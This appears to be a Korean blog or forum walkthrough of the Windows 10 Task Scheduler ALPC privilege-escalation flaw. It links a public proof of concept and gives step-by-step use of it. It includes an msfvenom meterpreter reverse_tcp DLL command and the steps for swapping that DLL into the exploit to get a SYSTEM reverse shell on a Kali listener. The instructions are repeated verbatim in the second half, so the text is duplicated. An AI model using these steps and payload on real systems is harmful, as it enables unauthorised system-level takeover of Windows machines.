win10의 작업 예약 서비스에서 내보낸 함수는 호출자의 권한을 확인하지 않습니다. 모든 권한을 가진 사용자는 이 함수를 호출하여 시스템의 중요한 파일에 대한 쓰기 권한을 얻을 수 있으므로 권한이 향상됩니다. 영향 범위: Windows 10, Windows Server 2016. 그룹의 모든 친구가 어제 재현하여 성공했습니다. 일부 친구도 Windows 8에서 시도하여 권한을 성공적으로 에스컬레이션할 수 있음을 확인했습니다.
준비: POC 다운로드, Windows 10 이미지, 프로세스 탐색기, CFF
POC: GitHub - SandboxEscaper/randomrepo: 임의 항목에 대한 저장소
windows10 ISO: msdn
프로세스 탐색기 다운로드: 프로세스 탐색기 - Windows Sysinternals | Microsoft Docs
CFF: Explorer Suite - NTCore
먼저 열기 메모장
아무런 차이가 없습니다. 실행
하위 프로세스 conhost 및 메모장이 포함된 cmd.exe가 시스템으로 생성되었습니다!
kali에서 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll >
windows10으로 이동
CFF에서 ALPC-TaskSched-LPE.dll을 열고 msf에서 생성된 dll을 교체한 후 저장합니다.
kali에서 모니터링 명령 실행
Windows 10에서 실행
kali로 돌아가면 미터프리터가 성공적으로 반송되었으며 시스템 권한이 있음을 알 수 있습니다.
준비: POC 다운로드, Windows 10 이미지, 프로세스 탐색기, CFF
POC: GitHub - SandboxEscaper/randomrepo: 임의 항목에 대한 저장소
windows10 ISO: msdn
프로세스 탐색기 다운로드: 프로세스 탐색기 - Windows Sysinternals | Microsoft Docs
CFF: Explorer Suite - NTCore
먼저 열기 메모장
아무런 차이가 없습니다. 실행
하위 프로세스 conhost 및 메모장이 포함된 cmd.exe가 시스템으로 생성되었습니다!
kali에서 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll >

windows10으로 이동
CFF에서 ALPC-TaskSched-LPE.dll을 열고 msf에서 생성된 dll을 교체한 후 저장합니다.
kali에서 모니터링 명령 실행
Windows 10에서 실행
kali로 돌아가면 미터프리터가 성공적으로 반송되었으며 시스템 권한이 있음을 알 수 있습니다.